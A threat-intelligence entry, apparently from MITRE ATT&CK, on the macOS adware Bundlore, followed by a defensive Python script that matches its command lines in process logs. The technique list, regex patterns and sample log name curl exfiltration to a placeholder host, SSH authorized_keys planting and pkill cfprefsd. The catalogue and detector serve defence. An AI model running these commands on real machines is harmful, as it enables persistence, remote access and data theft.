Bundlore

Bundlore is adware written for macOS that has been in use since at least 2015. Though categorized as adware, Bundlore has many features associated with more traditional backdoors.[1]

ID: S0482
Associated Software: OSX.Bundlore
Type: MALWARE
Platforms: macOS
Version: 1.1
Created: 01 July 2020
Last Modified: 10 February 2022

Associated Software Descriptions

Name Description
OSX.Bundlore [1]

Techniques Used

Domain ID Name Use

Enterprise T1036.005 Masquerading: Match Legitimate Name or Location

Bundlore has disguised a malicious .app file as a Flash Player update.[1]

Enterprise T1543.001 Create or Modify System Process: Launch Agent

Bundlore can persist via a LaunchAgent.[1]

Enterprise T1543.004 Create or Modify System Process: Launch Daemon

Bundlore can persist via a LaunchDaemon.[1]

Enterprise T1140 Deobfuscate/Decode Files or Information

Bundlore has used openssl to decrypt AES-encrypted payload data. Bundlore has also used base64 and RC4 with a hardcoded key to deobfuscate data.[1]

Enterprise T1059.002 Command and Scripting Interpreter: AppleScript

Bundlore can use AppleScript to inject malicious JavaScript into a browser.[1]

Enterprise T1059.004 Command and Scripting Interpreter: Unix Shell

Bundlore has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.[1]

Enterprise T1059.006 Command and Scripting Interpreter: Python

Bundlore has used Python scripts to execute payloads.[1]

Enterprise T1059.007 Command and Scripting Interpreter: JavaScript

Bundlore can execute JavaScript by injecting it into the victim's browser.[1]

Enterprise T1562.001 Impair Defenses: Disable or Modify Tools

Bundlore can change browser security settings to enable extensions to be installed. Bundlore uses the pkill cfprefsd command to prevent users from inspecting processes.[1][2]

Enterprise T1071.001 Application Layer Protocol: Web Protocols

Bundlore uses HTTP requests for C2.[1]

Enterprise T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification

Bundlore changes the permissions of a payload using the command chmod -R 755.[2]

Enterprise T1048 Exfiltration Over Alternative Protocol

Bundlore uses the curl -s -L -o command to exfiltrate archived data to a URL.[2]

Enterprise T1176 Browser Extensions

Bundlore can install malicious browser extensions that are used to hijack user searches.[1]

Enterprise T1189 Drive-by Compromise

Bundlore has been spread through malicious advertisements on websites.[1]

Enterprise T1027 Obfuscated Files or Information

Bundlore has obfuscated data with base64, AES, RC4, and bz2.[1]

Enterprise T1204.002 User Execution: Malicious File

Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.[1]

Enterprise T1082 System Information Discovery

Bundlore will enumerate the macOS version using /usr/bin/sw_vers -productVersion to determine which follow-on behaviors to execute.[1][2]

Enterprise T1098.004 Account Manipulation: SSH Authorized Keys

Bundlore creates a new key pair with ssh-keygen and drops the newly created user key in authorized_keys to enable remote login.[1]

Enterprise T1518 Software Discovery

Bundlore has the ability to enumerate which browser is being used, as well as version information for Safari.[1]

Enterprise T1105 Ingress Tool Transfer

Bundlore can download and execute new versions of itself.[1]

Enterprise T1056.002 Input Capture: GUI Input Capture

Bundlore prompts the user for their credentials.[1]

Enterprise T1057 Process Discovery

Bundlore has used the ps command to list processes.[1]

Enterprise T1564 Hide Artifacts

Bundlore uses the mktemp utility to make unique file and directory names for payloads, such as TMP_DIR=`mktemp -d -t x.[2]
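Several of the behaviours listed above are plain Unix command lines (pkill cfprefsd, chmod -R 755, curl -s -L -o, sw_vers -productVersion, ssh-keygen, mktemp -d -t, openssl), which makes them easy to hunt for in process-execution telemetry. The script below is an added example, not part of the ATT&CK page or of any Bundlore sample: it matches those command forms against a constructed, hypothetical log format and flags a parent process only when several of the page's techniques cluster under it, since any one of these commands is common in benign scripts.

```python
import re
from collections import defaultdict

# Each entry: regex over the executed command line, the ATT&CK technique ID the
# Bundlore page assigns to that behaviour, and a short label for reporting.
BUNDLORE_INDICATORS = [
    (r"\bpkill\s+cfprefsd\b",                 "T1562.001", "pkill cfprefsd"),
    (r"\bchmod\s+-R\s+755\b",                 "T1222.002", "chmod -R 755"),
    (r"\bcurl\s+-s\s+-L\s+-o\b",              "T1048",     "curl -s -L -o"),
    (r"/usr/bin/sw_vers\s+-productVersion\b", "T1082",     "sw_vers -productVersion"),
    (r"\bssh-keygen\b|\bauthorized_keys\b",   "T1098.004", "ssh-keygen / authorized_keys"),
    (r"\bmktemp\s+-d\s+-t\b",                 "T1564",     "mktemp -d -t"),
    (r"\bopenssl\b.*\benc\b.*\s-d\b",         "T1140",     "openssl enc -d"),
]

# Assumed (hypothetical) process-execution log format, one event per line:
#   <timestamp> pid=<n> ppid=<n> user=<name> cmd="<full command line>"
EVENT_RE = re.compile(r'^(\S+) pid=(\d+) ppid=(\d+) user=(\S+) cmd="(.*)"$')

def match_event(line):
    """Return (pid, ppid, [technique_ids]) for one log line, or None if it does not parse."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    pid, ppid, cmd = int(m.group(2)), int(m.group(3)), m.group(5)
    hits = [tid for pat, tid, _ in BUNDLORE_INDICATORS if re.search(pat, cmd)]
    return pid, ppid, hits

def scan(lines, min_hits=2):
    """Group technique hits by parent pid; report parents with at least min_hits distinct techniques."""
    per_parent = defaultdict(set)
    for line in lines:
        parsed = match_event(line)
        if parsed and parsed[2]:
            per_parent[parsed[1]].update(parsed[2])
    return {ppid: sorted(t) for ppid, t in per_parent.items() if len(t) >= min_hits}

# Constructed sample events, not real telemetry: pid 501 is an installer shell
# spawning the page's command sequence; pid 300 is an unrelated build script.
SAMPLE_LOG = """\
2022-02-10T10:00:01Z pid=502 ppid=501 user=alice cmd="/usr/bin/sw_vers -productVersion"
2022-02-10T10:00:02Z pid=503 ppid=501 user=alice cmd="/bin/sh -c pkill cfprefsd"
2022-02-10T10:00:03Z pid=504 ppid=501 user=alice cmd="chmod -R 755 /tmp/x.abc/payload"
2022-02-10T10:00:04Z pid=777 ppid=300 user=bob cmd="chmod -R 755 ./build"
2022-02-10T10:00:05Z pid=505 ppid=501 user=alice cmd="curl -s -L -o /tmp/x.abc/out http://example.invalid/u"
""".splitlines()

if __name__ == "__main__":
    for ppid, techniques in scan(SAMPLE_LOG).items():
        print(f"parent pid {ppid}: {', '.join(techniques)}")
```

The single chmod under pid 300 is below the clustering threshold and is not reported.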

References